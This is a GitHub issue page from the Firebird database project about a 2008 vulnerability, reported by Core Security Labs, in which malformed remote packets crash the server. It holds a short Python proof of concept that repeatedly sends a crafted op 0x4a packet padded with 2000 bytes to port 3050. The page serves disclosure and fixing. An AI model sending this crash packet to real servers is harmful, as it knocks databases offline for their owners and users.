Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Garbage data in the incoming remote packet may crash the server [CORE1681] #2106

Closed
firebird-issue-importer opened this issue Jan 9, 2008 · 11 comments

Comments

@firebird-issue-importer
Copy link

@firebird-issue-importer firebird-issue-importer commented Jan 9, 2008

Submitted by: @dyemanov

If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs, the disclosure is published here: http://www.coresecurity.com/?action=item&id=2095

Commits: 3201c3d 84a0dc8 ee8fdef

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 9, 2008

Commented by: @dyemanov

The affected packet types are: op_receive, op_start, op_start_and_receive, op_send, op_start_and_send, op_start_send_and_receive. The bug is caused by lack of validation for a not yet allocated port_object_vector in a few places of the remote subsystem.

Test case in Python:

import socket
import time

def getTargetIP():
return '127.0.0.1'

port = 3050
op = '\x4a'

packet = '\x00\x00\x00' + op + 'A' * 2000

for i in range(0, 5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((getTargetIP(), port))
s.send(str(packet))
s.close()
time.sleep(1)

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 9, 2008

Modified by: @dyemanov

Fix Version: 2.0.4 [ 10211 ]

Fix Version: 1.5.6 [ 10225 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 10, 2008

Modified by: @dyemanov

status: Open [ 1 ] => Resolved [ 5 ]

resolution: Fixed [ 1 ]

Fix Version: 2.1 RC1 [ 10201 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 10, 2008

Modified by: @dyemanov

description: If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. => If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs.

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 10, 2008

Modified by: @dyemanov

Attachment: CORE2007-1219-firebird-advisory.pdf [ 10742 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 10, 2008

Modified by: @dyemanov

Attachment: CORE2007-1219-firebird-advisory.pdf [ 10742 ] =>

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 28, 2008

Modified by: @dyemanov

description: If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs. => If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs, the disclosure is published here: http://www.coresecurity.com/?action=item&id=2095

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 28, 2008

Modified by: @pcisar

Workflow: jira [ 13806 ] => Firebird [ 14118 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Nov 18, 2008

Modified by: @pcisar

status: Resolved [ 5 ] => Closed [ 6 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 19, 2016

Modified by: @pavel-zotov

QA Status: No test

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Aug 20, 2016

Modified by: @pavel-zotov

status: Closed [ 6 ] => Closed [ 6 ]

QA Status: No test => Cannot be tested

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment